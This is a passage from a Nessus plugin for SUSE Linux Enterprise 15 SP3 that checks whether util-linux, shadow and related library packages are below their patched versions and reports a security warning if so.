value:\"p-cpe:/a:novell:suse_linux:libblkid-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libblkid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libblkid1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libeconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfdisk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmount1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmount1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmartcols1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libuuid-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libuuid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libuuid1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:login_defs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:util-linux-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:util-linux-systemd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLED_SAP15|SLES15|SLES_SAP15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED15 SP3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLED_SAP15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED_SAP15 SP3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES15\" && (! 
preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES15 SP3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP15 SP3\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'sp':'3', 
'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n 
{'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 
'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'uuidd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 
'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 
'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sle-module-transactional-server-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 
'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n 
{'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 
'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'sp':'3', 
'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 
'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'uuidd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-server-applications-release-15.3', 'sles-release-15.3']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libblkid-devel / libblkid-devel-static / 